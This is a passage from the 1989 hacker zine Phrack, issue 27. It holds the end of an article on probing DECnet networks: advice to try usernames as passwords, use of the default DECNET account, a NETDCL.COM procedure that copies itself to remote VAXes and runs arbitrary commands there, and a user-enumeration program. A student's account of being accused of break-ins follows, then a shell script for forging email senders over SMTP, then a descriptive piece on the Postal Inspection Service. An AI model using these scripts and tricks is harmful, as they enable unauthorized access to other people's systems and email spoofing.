  3805. users.  In fact, it's completely unproblematic to gain a list of all users.  An
  3806. example program, although written in Assembler, is even contained in the
  3807. manuals.  Enjoy a list of 1000 Userids complete with information about network
  3808. access rights.  The Pascal program is contained in Appendix B (later in this
  3809. file).
  3810.  
  3811. Sorry, passwords are not stored in this list.  Even the Sysop can't access
  3812. them, so that's no great loss.  Guess what passwords many accounts have?  Sure,
  3813. just try the username.  It's really amazing how ignorant users can be.  Of
  3814. course this is a problem of group-accounts, that many users have access to and
  3815. must know the password.  Nevertheless, the hole is there.
  3816.  
  3817. The real hacker, once he has logged in on such an account surely finds ways to
  3818. gain system privilege.  This requires in-depth knowledge of the Kernel of VMS
  3819. and is another story I won't deal with.
  3820.  
  3821.  
  3822. What is DECNET?
  3823. ~~~~~~~~~~~~~~~
  3824. DECNET is the means, by which computers from Digital Equipment Corporation
  3825. (DEC) can be connected to each other.  Each computer in this network has an
  3826. address which is normally given by x.y where x is the area number (an integer)
  3827. and y is the node number in this area which ranges from 1 to 1023.  To access
  3828. DECNET nodes, one specifies just one number, which can be computed from x and y
  3829. by the following formula:
  3830.  
  3831.    nodenumber = x * 1024 + y
  3832.  
  3833. Often nodes, especially local nodes (having the same area number as your
  3834. current node) have names assigned to them so they can be memorized more easily.
  3835.  
  3836.  
  3837. Interesting DECNET Commands
  3838. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3839. To get a (first) list of available DECNET nodes, try the command
  3840.  
  3841.    $ SHOW NET
  3842.  
  3843. The $ (as in the following examples) is the default prompt of VMS and should
  3844. not be entered.  This Command will give you a list of (hopefully) reachable
  3845. nodes.  All lines of the output contain the network address in the form x.y and
  3846. normally a name which this node is known by.
  3847.  
  3848. Your current node is mentioned in the first line in "VAX/VMS network status for
  3849. local node X.Y Name".  In most cases you will then just see local nodes listed
  3850. and a line saying "The next hop to the nearest area router is node XX.YY".
  3851. This node contains more information about the DECNET than the node you are
  3852. currently on.  If you have an account on the specified node, log on there and
  3853. try again.  If not, well, play with the local nodes listed and look at the
  3854. command NCP shown later.
  3855.  
  3856. Now, what can you do with those nodes that were mentioned in the output?
  3857. First command is
  3858.  
  3859.     $ SET HOST <node>
  3860.  
  3861. Where <node> is either a nodename or a nodenumber (see above).  Thus, if SDIVAX
  3862. was listed in the SHOW NET list as 42.13, then you may try both SET HOST SDIVAX
  3863. or SET HOST 43021 (42*1024+13 = 43021).  Probably you'll get that ugly
  3864. Username: prompt.  You're on your own then.
  3865.  
  3866. Second thing you can do with DECNET is email.  On VMS the MAIL program can send
  3867. mail to other users.  If you and your friend both have accounts on the same
  3868. DECNET, you can send him mail if you know his nodename or nodenumber by
  3869. specifying SDIVAX::FREDDY or 43021::FREDDY.
  3870.  
  3871. Then there is PHONE.  This is a utility to talk to another (or several) user(s)
  3872. on a DECNET.  If you want to call Freddy, just type PHONE SDIVAX::FREDDY.  If
  3873. he is logged in, his terminal will ring and if he answers his phone (with PHONE
  3874. ANSWER) you may chat with him.  PHONE has another nice feature built in:  You
  3875. may ask for a list of active users on a remote name by %DIR SDIVAX.  See the
  3876. online help on PHONE for further details.
  3877.  
  3878. The next really mighty DECNET facility is remote file access.  Valid filenames
  3879. in VMS consist of the components node, disk, directory and filename.  An
  3880. example for a valid filename is SDIVAX::DISK$2:[NASA.SECRET]SDI.DOC where some
  3881. components may be omitted and default values are used instead.
  3882.  
  3883. File names including the node specification may be used in nearly all VMS
  3884. commands examples being DIR, TYPE and COPY.  Access to the specified file is
  3885. granted, if the protection of the file allows access by world, or if the owner
  3886. of the file is the user DECNET.  This pseudo userid is available on every VAX
  3887. and has the password DECNET.  Access to that account is limited to network
  3888. processing so you can't just log in with Username=DECNET, password=DECNET.  By
  3889. default a special directory owned by the User DECNET exists on each node.  This
  3890. directory can be accessed by just specifying the nodename without any disk or
  3891. directory information, as in
  3892.  
  3893.     $ DIR SDIVAX::
  3894.  
  3895. If users played too much with this feature, the directory may be protected or
  3896. otherwise disabled.
  3897.  
  3898. The last feature described here is the remote command processing facility.  If
  3899. you try to open a file with the specification
  3900.  
  3901.     $ SDIVAX::"task=foo.com"
  3902.  
  3903. Instead of opening the DCL procedure, foo.com will be executed.  To make use of
  3904. this feature easily, programs have been written to interactively communicate
  3905. with a remote host.  The command procedure NETDCL.COM does this task and is
  3906. contained in the Appendix A (seen later in this file.  Look at this
  3907. DCL-Procedure to learn more about DECNET features.
  3908.  
  3909.  
  3910. The Key To Universal Knowledge
  3911. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3912. There is a pearl under the programs on a VAX.  It's called NCP and will give
  3913. readily information about the whole DECNET.  You start this program either by
  3914. MCR NCP or by doing a SET DEF SYS$SYSTEM and RUN NCP.  Use the on-line Help
  3915. provided in NCP (which means Network Control Program) to learn more.
  3916.  
  3917.     NCP> SHOW KNOWN NODES
  3918.  
  3919. Provides a list of all nodes known on your current node, including the names
  3920. you may use as node specifications.  But there is more:  You may connect to
  3921. another node's database and get a list of nodes which are known at the remote
  3922. node with
  3923.  
  3924.     NCP> SET EXEC SDIVAX
  3925.  
  3926. And then again the SHOW KNOWN NODES command.  This feature should provide you
  3927. with a nearly infinite list of node names and node numbers.
  3928.  
  3929.  
  3930. Conclusion
  3931. ~~~~~~~~~~
  3932. There are many nice features available under DECNET.  Probably I don't know
  3933. all, but I hope this article showed you the mighty tools available on VMS to
  3934. make network life easier.
  3935.  
  3936.  
  3937. WARNING:  The author has had bad experiences with some node administrators,
  3938.           who didn't like their machines being contacted over DECNET.  Yes,
  3939.           that's the drawback, each DECNET activity is written to a protocol
  3940.           file that is printed and deleted every month.  So you should be
  3941.           careful in using DECNET.
  3942. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3943.  
  3944. APPENDIX A:
  3945.  
  3946. The Procedure NETDCL.COM, sometimes called TELL.COM, NET.COM
  3947. -----------------------
  3948. $ IF f$mode() .EQS. "NETWORK" THEN GOTO network
  3949. $ IF p1 .EQS. "" THEN READ/PROMPT="_Node: " sys$command p1
  3950. $ nodespec = p1 - "::"
  3951. $ nodename = f$extract(0,f$locate("""",nodespec),nodespec)
  3952. $! include the following line for "hard cases"
  3953. $! nodespec = nodespec+"""decnet decnet"""
  3954. $ ON WARNING THEN CONTINUE
  3955. $ CLOSE/ERR=open_server dcl_server
  3956. $open_server:
  3957. $ OPEN/READ/WRITE dcl_server 'nodespec'::"TASK=NETDCL"/ERROR=open_failure
  3958. $ ON WARNING THEN GOTO exit
  3959. $flush_output:
  3960. $ READ dcl_server record
  3961. $ IF record .EQS. "SEND_ME_A_COMMAND" -
  3962.   THEN GOTO send_command
  3963. $ WRITE sys$output record
  3964. $ GOTO flush_output
  3965. $send_command:
  3966. $ IF p2 .NES. "" THEN GOTO single_command
  3967. $ READ sys$command record /PROMPT="''nodename'> " /END=exit
  3968. $ record  := 'record
  3969. $ IF record .EQS. "EXIT" THEN GOTO exit
  3970. $ WRITE dcl_server record
  3971. $ GOTO flush_output
  3972. $single_command:
  3973. $ command := 'p2' 'p3' 'p4' 'p5' 'p6' 'p7' 'p8'
  3974. $ WRITE dcl_server command
  3975. $single_flush:
  3976. $ READ dcl_server record
  3977. $ IF record .EQS. "SEND_ME_A_COMMAND"-
  3978. $ THEN GOTO exit
  3979. $ WRITE sys$output record
  3980. $ GOTO single_flush
  3981. $open_failure:
  3982. $ ON WARNING THEN EXIT
  3983. $ COPY/LOG Netdcl.Com 'nodespec'::
  3984. $ WAIT 0:0:1
  3985. $ OPEN/READ/WRITE dcl_server 'nodespec'::"TASK=NETDCL"
  3986. $ ON WARNING THEN GOTO exit
  3987. $ GOTO flush_output
  3988. $exit:
  3989. $ CLOSE dcl_server
  3990. $ EXIT
  3991. $network:
  3992. $ OPEN/READ/WRITE dcl_link sys$net
  3993. $ SET NOON
  3994. $ dcl_verify = 'f$verify(0)'
  3995. $ DEFINE sys$output dcl_link:
  3996. $server_loop:
  3997. $ WRITE dcl_link "SEND_ME_A_COMMAND"
  3998. $ READ dcl_link dcl_string /END_OF_FILE=server_exit /ERROR=server_exit
  3999. $ 'dcl_string'
  4000. $  GOTO server_loop
  4001. $server_exit:
  4002. $ IF dcl_verify THEN set verify
  4003. $ CLOSE dcl_link
  4004. $ DEASSIGN sys$output
  4005. $ EXIT
  4006. -----------------------
  4007.  
  4008. APPENDIX B
  4009.  
  4010. ALLUSER.PAS - Show all registered users
  4011. -----------------------
  4012. {
  4013. * alluser.pas - get names of all users
  4014. * by Deep, 1989
  4015. * This program is freely redistributable as long no modifications are made
  4016. * DISCLAIMER: I take no responsibility for any use or abuse of this
  4017. *             program.  It is given for informational purpose only.
  4018. *
  4019. * program history:
  4020. * 04-May-89   started
  4021. * 02-Jun-89   clean up of code
  4022. }
  4023. [inherit ('sys$library:starlet.pen')]
  4024. program alluser(input,output);
  4025.  
  4026.   type $word      = [word] 0..65535;
  4027.        $byte      = [byte] 0..255;
  4028.        $quadword  = record
  4029.                       lo,hi : unsigned;
  4030.                     end;
  4031.        $uquad  = record
  4032.                       lo,hi : unsigned;
  4033.                     end;
  4034. var
  4035.   id: unsigned;
  4036.   status, status2: integer;
  4037.   length: $WORD;
  4038.   attrib,context,context2,context3: unsigned;
  4039.   ident, ident2: unsigned;
  4040.   name: varying [512] of char;
  4041.   holder: $uquad;
  4042.  
  4043. begin
  4044.  
  4045. writeln('Alluser - use at your own risk!');
  4046. status := SS$_NORMAL;
  4047. { id = -1 selects next identifier }
  4048. id := -1;
  4049. context := 0;
  4050. while (status <> SS$_NOSUCHID) do
  4051.    begin
  4052.    { find next identifier }
  4053.    status := $idtoasc(id,name.length,name.body,ident,attrib,context);
  4054.    if (status <> SS$_NOSUCHID) then begin
  4055.       write(pad(name,' ',16));
  4056.       if (ident div (65536*32768) > 0) then
  4057.          { it's a rights-list, so print the hex-value of the identifier }
  4058.          begin
  4059.          writeln(oct(ident,12));
  4060.          context2 := 0;
  4061.          context3 := 0;
  4062.          { find all holders of this right }
  4063.          repeat
  4064.             holder := zero;
  4065.             status2 := $find_holder(ident,holder,attrib,context2);
  4066.             if (holder.lo <> 0) then begin
  4067.                 ident2 := ident;
  4068.                 { get UIC and username }
  4069.                 status := $idtoasc(holder.lo,name.length,name.body,ident2
  4070.                     ,attrib,context3);
  4071.                 write('                ',pad(name,' ',16));
  4072.                 writeln('[',oct(holder.lo div 65536,3),','
  4073.                     ,oct(holder.lo mod 65536,3),']');
  4074.                end;
  4075.          until (holder.lo = 0);
  4076.          end
  4077.       else
  4078.          { it's a UIC, so translate to [grp,user] }
  4079.          begin
  4080.          writeln('[',oct(ident div 65536,3),',',oct(ident mod 65536,3),']');
  4081.          end;
  4082.       end;
  4083.    end;
  4084. end.
  4085. -----------------------
  4086.  
  4087. This article has been brought to you by Deep Thought of West Germany.  If you
  4088. liked this article, grant me access if I once drop in your BBS!
  4089. _______________________________________________________________________________
  4090.  
  4091.  
  4092. Received: (from C483307@UMCVMB for TK0JUT1@UCLAMAIL via NJE)
  4093.          (C483307-9202;     114 LINES); Tue, 27 Jun 89 15:54:16 CDT
  4094. Date:    Tue, 27 Jun 89 15:54 CDT
  4095. To:      TK0JUT1
  4096. From:    C483307@UMCVMB
  4097.  
  4098. Comment: converted from NETDATA format at NIU
  4099.                                 ==Phrack Inc.==
  4100.  
  4101.                      Volume Three, Issue 27, File 7 of 12
  4102.  
  4103.                <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>
  4104.                <:>                                          <:>
  4105.                <:>          The Making Of A Hacker          <:>
  4106.                <:>                                          <:>
  4107.                <:>        by Framstag of West Germany       <:>
  4108.                <:>                                          <:>
  4109.                <:>                June 2, 1989              <:>
  4110.                <:>                                          <:>
  4111.                <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>
  4112.  
  4113.  
  4114. Prologue For None VMS Users
  4115. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4116.      DECnet is the network for DEC machines, in most cases you can say VAXes.
  4117. DECnet allows you to do:   - e-mail
  4118.                            - file transfer
  4119.                            - remote login
  4120.                            - remote command
  4121.                            - remote job entry
  4122.                            - PHONE
  4123.      PHONE is an interactive communication between users and is equal to TALK
  4124. on UNIX or a "deluxe"-CHAT on VM/CMS.
  4125.  
  4126.      BELWUE, the university network of the state Baden-Wuerttemberg in
  4127. West Germany contains (besides other networks) a DECnet with about 400 VAXes.
  4128. On every VAX there is standard-account called DECNET with pw:= DECNET, which is
  4129. not reachable via remote login.  This account is provided for several
  4130. DECnet-Utilities and as a pseudo-guest-account.  The DECNET-account has very
  4131. restricted privileges:  You cannot edit a file or make another remote login.
  4132.  
  4133.     The HELP-menu is equipped by the system and is similar to the MAN command
  4134. on UNIX.
  4135.  
  4136.     More information on DECnet can be found in "Looking Around In DECnet" by
  4137. Deep Thought in this very issue of Phrack Inc.
  4138. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4139.  
  4140.      Here, at the University of Ulm, we have an *incredibly* ignorant computer
  4141. center staff, with an even bigger lack of system-literature (besides the 80 kg
  4142. of VAX/VMS-manuals).  The active may search for information by himself, which
  4143. is over the level of "run," "FORTRAN," or "logout."  My good luck that I have
  4144. other accounts in the BELWUE-DECnet, where more information is offered for the
  4145. users.  I am a regular student in Ulm and all my accounts are completely legal
  4146. and corresponding to the German laws.  I don't call myself a "hacker," I feel
  4147. more like a "user" (...it's more a defining-problem).
  4148.  
  4149.      In the HELP-menu in a host in Tuebingen I found the file netdcl.com and
  4150. the corresponding explanation, which sends commands to the DECNET-Account of
  4151. other VAXes and executes them there (remote command).  The explanation in the
  4152. HELP-menu was idiot-proof -- therefore for me, too :-)
  4153.  
  4154.      With the command "$ mcr ncp show known nodes" you can obtain a list of all
  4155. netwide active VAXes, as is generally known, and so I pinged all these VAXes to
  4156. look for more information for a knowledge-thirsty user.  With "help", "dir" and
  4157. other similar commands I look around on those DECnet accounts, always watching
  4158. for topics related to the BELWUE-network.  It's a pity, that 2/3 of all VAXes
  4159. have locked the DECNET-Account for NETDCL.COM.  Their system managers are
  4160. probably afraid of unauthorized access, but I cannot imagine how there could be
  4161. such an unauthorized access, because you cannot log on this account -- no
  4162. chance for trojan horses, etc.
  4163.  
  4164.      Some system managers called me back after I visited their VAX to chat with
  4165. me about the network and asked me if they could help me in any way. One sysop
  4166. from Stuttgart even sent me a version of NETDCL.COM for the ULTRIX operation
  4167. system.
  4168.  
  4169.      Then, after a month, the  H O R R O R  came over me in shape of a the
  4170. following mail:
  4171.  
  4172. --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
  4173. From:   TUEBINGEN::SYSTEM       31-MAY-1989 15:31:11.38
  4174. To:     FRAMSTAG
  4175. CC:
  4176. Subj:   don't make any crap, or you'll be kicked out!
  4177.  
  4178. From:   ITTGPX::SYSTEM       29-MAY-1989 16:46
  4179. To:     TUEBINGEN::SYSTEM
  4180. Subj:   System-breaking-in 01-May-1989
  4181.  
  4182. To the system manager of the Computer TUEBINGEN,
  4183.  
  4184. On May 1st 1989 we had a System-breaking-in in our DECNET-account, which
  4185. started from your machine.  By help of our accounting we ascertained your user
  4186. FRAMSTAG to have emulated an interactive log-on on our backbone-node and on
  4187. every machine of our VAX-cluster with the "trojan horse" NETDCL.COM.  Give us
  4188. this user's name and address and dear up the occurrence completely.  We point
  4189. out that the user is punishable.  In case of repetition we would be forced to
  4190. take corresponding measures.  We will check whether our system got injured.  If
  4191. not, this time we will disregard any measure.  Inform us via DECnet about your
  4192. investigation results -- we are attainable by the nodenumber 1084::system
  4193.  
  4194. Dipl.-Ing. Michael Hager
  4195. --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
  4196.  
  4197.      My system manager threatened me with the deleting of my account, if I
  4198. would not immediately enlighten the affair.  *Gulp*!
  4199.      I was conscious about my innocence, but how to tell it to the others?  I
  4200. explained, step by step, everything to my system manager.  He then understood
  4201. after a while, but the criminal procedure still hovered over me... so, I took
  4202. quickly to my keyboard, to compose file of explanations and to send it to that
  4203. angry system manager in Stuttgart (node 1084 is an institute there).  But no
  4204. way out:  He had run out of disk quota and my explanation-mail sailed into the
  4205. nirwana:
  4206.  
  4207. --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
  4208. $ mail explanation
  4209.   To:   1084::system
  4210. %MAIL-E, error sending to user SYSTEM at 1084
  4211. %MAIL-E-OPENOUT, error opening SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI;
  4212. as output
  4213. -RMS-E-CRE, ACP file create failed
  4214. -SYSTEM-F-EXDISKQUOTA, disk quota exceeded
  4215. --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
  4216.  
  4217.      Also the attempt of a connection with the PHONE-facilty failed:  In his
  4218. borderless hacker-paranoia, he cut off his PHONE... and nowhere is a list with
  4219. the REAL-addresses of the virtual DECnet-addresses available (to prevent
  4220. hacking).  Now I stood there with the brand "DANGEROUS HACKER!" and I had no
  4221. chance to vindicate myself.  I poured out my troubles to an acquaintance of
  4222. mine, who is a sysop in the computer-center in Freiburg.  He asked other sysops
  4223. and managers thru the whole BELWUE-network until someone gave him a telephone
  4224. number after a few days -- and that was the right one!
  4225.  
  4226.      I phoned to this Hager and told him what I had done with his
  4227. DECnet-account and also what NOT.  I wanted to know which crime I had
  4228. committed.  He promptly cancelled all of his reproaches, but he did not excuse
  4229. his defamous incriminations.  I entreated him to inform my system manager in
  4230. Tuebingen that I have done nothing illegal and to stop him from erasing my
  4231. account.  This happens already to a fellow student of mine (in this case, Hager
  4232. was also guilty).  He promised me that he would officially cancel his
  4233. reproaches.
  4234.  
  4235.      After over a week this doesn't happen (I'm allowed to use my account
  4236. further on).  In return for it, I received a new mail from Hager on another
  4237. account of mine:
  4238.  
  4239. --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
  4240. From:   1084::HAGER         1-JUN-1989 12:51
  4241. To:     50180::STUD_11
  4242. Subj:   System-breaking-in
  4243.  
  4244. On June 1st 1989 you have committed a system-breaking-in on at least one of our
  4245. VAXes.  We were able to register this occurrence.  We would be forced to take
  4246. further measure if you did not dear up the occurrence completely until June
  4247. 6th.
  4248.  
  4249. Of course the expenses involved would be imposed on you.  Hence enlightenment
  4250. must be in your own interest.
  4251.  
  4252. We are attainable via DECnet-mail with the address 1084::HAGER or via following
  4253. address:
  4254.  
  4255. Institut fuer Technische Thermodynamik und Thermische Verfahrenstechnik
  4256. Dipl.-Ing. M. Hager    Tel.: 0711/685-6109
  4257. Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398
  4258. Pfaffenwaldring 9/10-1
  4259. 7000 Stuttgart-80
  4260.  
  4261.  M. Hager
  4262.  M. Mrzyglod
  4263. --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
  4264.  
  4265. This was the reaction of my attempt: "$ PHONE 1084::SYSTEM".  I have not
  4266. answered to this mail.  I AM SICK OF IT!
  4267.  
  4268.  
  4269.                                    Framstag
  4270.                           (FRAMSTAG@DTUPEV5A.BITNET)
  4271.  
  4272.          With Special Thanks For Translation Assistance To Schrulli B.
  4273. _______________________________________________________________________________
  4274.  
  4275.  
  4276.                                 ==Phrack Inc.==
  4277.  
  4278.                      Volume Three, Issue 27, File 8 of 12
  4279.  
  4280.         <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  4281.         <><><><>                                              <><><><>
  4282.         <><><>             Sending Fake Mail In Unix            <><><>
  4283.         <><>                                                      <><>
  4284.         <>                     by Dark OverLord                     <>
  4285.         <><>                                                      <><>
  4286.         <><><>                   May 26, 1989                   <><><>
  4287.         <><><><>                                              <><><><>
  4288.         <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
  4289.  
  4290.  
  4291. Here is a shell script that can be use to send fakemail from any Unix system.
  4292. Have fun and stay out of trouble.
  4293.  
  4294.  
  4295. -Dark Overlord
  4296.  
  4297.         -=-=-=-=-=-=-=-=-=-=-=-=-=  Cut here -=-=-=-=-=-=-=-=-=-=-=-=-=
  4298. ! /bin/sh
  4299. #Mfakemail - A shell script to send fakemail.
  4300. #M##M#Met up the path.
  4301. PATH=/usr/ucb:/bin:$HOME/Bin
  4302. #Marse the command line
  4303. case $ in
  4304. 0)echo "USAGE: user@host [ from@somewhere ] [ mailer_host ]" >& 2
  4305. exit 1
  4306. ;;
  4307. 1)mailto=$1
  4308. from="person@campus"
  4309. mailerhost=localhost
  4310. ;;
  4311. 2)mailto=$1
  4312. from=$2
  4313. mailerhost=localhost
  4314. ;;
  4315. 3)mailto=$1
  4316. from=$2
  4317. mailerhost=$3
  4318. ;;
  4319. *)echo "USAGE: user@host [ from@somewhere ] [ mailer_host" >& 2
  4320. exit 1
  4321. ;;
  4322. esac
  4323. #Mreate a header for sendmail
  4324. cat <<E!O!F!> /tmp/cli$$
  4325. helo $mailerhost
  4326. mail from:$from<$from>
  4327. rcpt to: $mailto <$mailto>
  4328. data
  4329. From: $from
  4330. To: $mailto
  4331. Subject:
  4332. Status: RO
  4333.  
  4334.  
  4335. E!O!F!
  4336. #Mdit the mailer
  4337. vi /tmp/cli$$
  4338. #Mdd a ending for the mailer
  4339. cat <<E!O!F!>> /tmp/cli$$
  4340. .
  4341. quit
  4342. E!O!F!
  4343. #Monnect to the remote host's sendmail daemon
  4344. telnet $mailerhost smtp < /tmp/cli$$
  4345. #Mlean up time
  4346. /bin/rm -f /tmp/cli$$
  4347. _______________________________________________________________________________
  4348.  
  4349.  
  4350.                                 ==Phrack Inc.==
  4351.  
  4352.                      Volume Three, Issue 27, File 9 of 12
  4353.  
  4354.  
  4355.                    +======================================+
  4356.  
  4357.                          The Postal Inspection Service
  4358.  
  4359.                  (C) UNITED STATES POSTAL SERVICE (U.S. MAIL)
  4360.  
  4361.                                Brought to you by
  4362.  
  4363.                                    Vendetta
  4364.  
  4365.                                  May 10, 1989
  4366.  
  4367.                    +======================================+
  4368.  
  4369.  
  4370. Protecting The U.S. Mails
  4371. ~~~~~~~~~~~~~~~~~~~~~~~~~
  4372. The protection of the U.S. Mail and the mail system is the responsibility of
  4373. the Postal Inspection Service.  As the law enforcement and audit arm of the
  4374. U.S. Postal Service, the Inspection Service is a highly specialized,
  4375. professional organization performing investigative, law enforcement, and audit
  4376. functions essential to a stable and sound postal system.
  4377.  
  4378. As our country's oldest federal law enforcement agency, the Inspection Service
  4379. has jurisdiction in all criminal matters infringing on the integrity and
  4380. security of the mail, and the safety of all postal valuables, property, and
  4381. personnel.
  4382.  
  4383. Since the beginning of a postal system in this country, criminal and
  4384. administrative problems of the Postal Service have been interwoven.  By
  4385. detecting and investigating crimes against the mail and postal revenue,
  4386. establishing safe and efficient postal systems, protecting all postal
  4387. properties, assuring that the postal system is not criminally misused to the
  4388. detriment of the public, the Inspection Service plays an integral part in
  4389. maintaining effective operations in the Postal Service.
  4390.  
  4391. The agency's activities make a vital contribution to the protection of the
  4392. nation's economy.  Security and enforcement functions of the Inspection Service
  4393. provide assurance to American business for the safe exchange of funds and
  4394. securities through the U.S. Mail, and to postal customers of the sanctity of
  4395. the seal in transmitting correspondence and messages to all parts of the world.
  4396. Audits ensure stability to financial operations, help control costs, and
  4397. promote increased efficiency in our Postal Service.
  4398.  
  4399.  
  4400. Postal Inspectors
  4401. ~~~~~~~~~~~~~~~~~
  4402. Postal Inspectors are the fact finding and investigative agents of the U.S.
  4403. Postal Service.  Today nearly two-thirds of their time is spent in
  4404. investigating and solving postal related crimes.  Possessing statutory power of
  4405. arrest, they apprehend violators of the law and work closely with U.S.
  4406. Attorneys in prosecuting cases in court.  Their work also includes crime
  4407. prevention, the audit of postal operations, investigation of accidents and a
  4408. wide variety of other service and audit matters.
  4409.  
  4410. The work of a Postal Inspector requires total dedication and a willingness to
  4411. work long hours.  Investigations of postal crimes which often entail interstate
  4412. or international coordination, and the responsibility to restore mail service
  4413. following catastrophes such as floods, fire, and airplane wrecks, are
  4414. time-consuming and can be hazardous.
  4415.  
  4416. There are approximately 1,900 Postal Inspectors stationed in the United States
  4417. and Puerto Rico.  All trainees undergo an eleven-week basic training course
  4418. involving use of firearms, defensive tactics, legal matters, search and
  4419. seizure, arrest techniques, court procedures, postal operations, audit
  4420. functions, and a detailed study of the federal laws in which the Inspection
  4421. Service has jurisdiction.  Classes are conducted at the Inspection Service
  4422. training center in Potomac, Maryland.
  4423.  
  4424. Refresher courses keep Inspectors informed of current court decisions, laws,
  4425. and legal procedures.  Additional specialized courses are continually held to
  4426. equip the Service with expertly trained personnel.
  4427.  
  4428. All applicants for the position of Postal Inspector must successfully complete
  4429. the following steps; entry examination; a comprehensive background
  4430. investigation including ma medical examination; the candidate assessment center
  4431. review; and all phases of the basic training course.
  4432.  
  4433.  
  4434. Inspection Service Activity
  4435. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4436.          Criminal investigations and postal crime prevention represent
  4437.              the greatest portion of Inspection Service activity.
  4438.  
  4439. Postal Inspectors investigate violations of all postal laws and other related
  4440. criminal violations.  Crimes within the purview of postal investigations
  4441. include mail fraud, the illegal transmission of controlled substances through
  4442. the U.S. Mail, the mailing of child pornography, thefts of mails or postal
  4443. valuables, assaults on postal employees, bombs sent through the mails or
  4444. directed against postal properties, and the mailing of matter containing
  4445. poison, unauthorized concealable firearms, and harmful or prohibited articles.
  4446.  
  4447. Five crime laboratories located throughout the country assist Inspectors in
  4448. analyzing evidentiary material needed for identifying and tracing criminal
  4449. suspects and in providing expert testimony for cases brought to trial.
  4450.  
  4451. The objectives of postal crime prevention are to anticipate, identify, and
  4452. analyze those areas of greatest crime risk potentially affecting employees,
  4453. funds, property, and postal customers.  Postal Inspectors then take action to
  4454. remove or reduce that risk and maintain the integrity of the Postal Service.
  4455.  
  4456.                 "The Postal Inspection Service is responsible
  4457.                 for the internal audit of the Postal Service."
  4458.  
  4459. Postal Inspectors provide management with independent audits and investigations
  4460. of all postal activities as a part of the Postal Service's internal control
  4461. system.
  4462.  
  4463. Audits of installations and systems protect the assets of the Service, improve
  4464. its financial management system, assist in the resolution of customer
  4465. complaints, investigate matters of Congressional interests, and identify
  4466. specific improvements for better customer service and more economical
  4467. operations.
  4468.  
  4469. Financial audits provide an independent check on the adequacy and effectiveness
  4470. of control systems; verify the existence of assets and ensure the proper
  4471. safeguards are maintained.  Operations audits are conducted to assist postal
  4472. management in the operation of an efficient, and reliable Postal Service.
  4473.  
  4474.  
  4475. Security Force
  4476. ~~~~~~~~~~~~~~
  4477. Postal Police Officers provide protection to mail, postal valuables, postal
  4478. employees, facilities, and vehicles of the Postal Service.  As part of the law
  4479. enforcement team, they assist Postal Inspectors in the enforcement of certain
  4480. postal laws and regulations on postal premises and provide mobile response
  4481. unites in emergency situations involving the Postal Service.
  4482.  
  4483. Equipped with portable radios and alerted by closed circuit television they
  4484. provide perimeter security to major postal facilities and other buildings
  4485. operated by the Postal Service.  Their presence in postal installations
  4486. throughout the country is a deterrent to postal crimes and an aid to employee
  4487. morale.
  4488.  
  4489. Postal Police Officers also are used to escort high value mail while in transit
  4490. between postal units and at airports.
  4491.  
  4492. Experience in military or civil law enforcement, industrial security, or
  4493. similar occupations is an asset for positions in the Security Force.  All
  4494. appointees undergo a four-week training course conducted at the Inspection
  4495. Service's training center.
  4496.  
  4497.  
  4498. Coordination With Other Agencies
  4499. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4500. The Inspection Service extends full cooperation to all local and federal
  4501. investigative and prosecutive authorities in law enforcement matters to ensure
  4502. greater protection to the public.  Postal Inspectors participate in the
  4503. Department of Justice national strike force teams aimed at curtailing
  4504. widespread criminal acts of an organized nature.  Postal Inspectors also work
  4505. closely with the External Auditors in providing support to the certification of
  4506. the Postal Service's financial statements.
  4507.  
  4508.  
  4509. Conviction Rate
  4510. ~~~~~~~~~~~~~~~
  4511. The Inspection Service maintains a consistently high conviction rate each year
  4512. of approximately 98% of cases brought to trial, a rate not exceeded by any
  4513. other federal law enforcement agency.
  4514.  
  4515.  
  4516. Jurisdiction, Postal Laws, and Protection
  4517. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4518. The Inspection Service exercises investigative jurisdiction over approximately
  4519. 85 postal-related statues.  These can be grouped in two categories:  Criminal
  4520. acts against the mails, postal facilities, or postal personnel; and criminal
  4521. misuse of the postal system.
  4522.  
  4523.  
  4524. MAIL FRAUD
  4525.  
  4526. All criminal activity involving use of the U.S. Mail with intent to defraud
  4527. comes under the jurisdiction of the Postal Inspection Service.  The Mail Fraud
  4528. Law is the oldest consumer protection law in the United States and is one of
  4529. the most effective prosecutive tool in fighting white collar and organized
  4530. crime.  Millions of dollars are lost each year through mail fraud which cheats
  4531. not only the poor and the elderly, but businessmen and the consumer as well.
  4532. Prevalent schemes include insurance, banking, false billings; land and
  4533. advance-fee selling swindles; franchise schemes; work-at-home and fraudulent
  4534. diploma schemes; charity schemes; promotions of fake health cures, beauty
  4535. devices, fast-working diets, and sex stimulants; chain letters, lotteries, and
  4536. solicitations for the sale of advertising specialty items.
  4537.  
  4538. While Postal Inspectors have no statutory authority to act as intermediaries in
  4539. the settlement of unsatisfactory financial or property transactions conducted
  4540. through the mails, their investigations frequently result in the discontinuance
  4541. of fraudulent or borderline operations.  Administrative mail-stop orders may be
  4542. issued to prevent continuing public loss while sufficient evidence is being
  4543. developed for criminal prosecutive action in the courts, or in cases where
  4544. false representations, but not necessarily fraudulent intent, can be proven.
  4545. The Inspection Service has a leading role in consumer protection through the
  4546. implementation of educational programs designed to prevent mail fraud schemes
  4547. from developing, and through its efforts to resolve complaints relating to
  4548. consumer/vendor misunderstandings or poor business practices.
  4549.  
  4550.  
